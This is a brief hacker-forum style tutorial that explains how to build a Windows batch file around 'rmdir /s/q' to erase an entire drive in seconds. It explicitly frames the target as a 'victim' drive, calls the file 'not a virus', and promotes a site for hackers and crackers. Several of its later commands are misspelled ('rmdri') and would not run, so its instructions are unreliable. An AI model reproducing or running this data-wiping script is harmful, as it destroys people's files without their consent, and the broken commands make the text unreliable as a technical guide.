Hackers And cracker there also join www.n0bz.com

How to format hard Drives in few sec Batch Programming


Hello Newbister Today i gonna show you how to to format hard drive in few sec :D its a batch file programming i am use some batch programming code according to my topic ..

Introduction:-
 This is a not Virus its a just simple code we used this and format hard drive ..

What we can delete ?
we can delete Full Drive even we can delete all in once folder which have in hard drive . all images all excel , winrar , zip ,file or folders :D

1. Open noted pad and type type giving code


rmdir /s/q (Your drive name):\

Example:-
 now i wanna format victim  drive now i am write code
rmdir /s/q G:\ 

2. Save it using command ctrl+S in .bat format

Example:-
                      filename.bat



Before G drive



After run your batch file



Now G drive is format in few sec :D :D if you wanna format Multiple Drive then use same code but change your drive name  :)

If you wanna format your E or D drive then use this code
rmdri /s/q D:\
rmdri /s/q/ E:\

Thanks for visiting like and share :)

For more Watch Video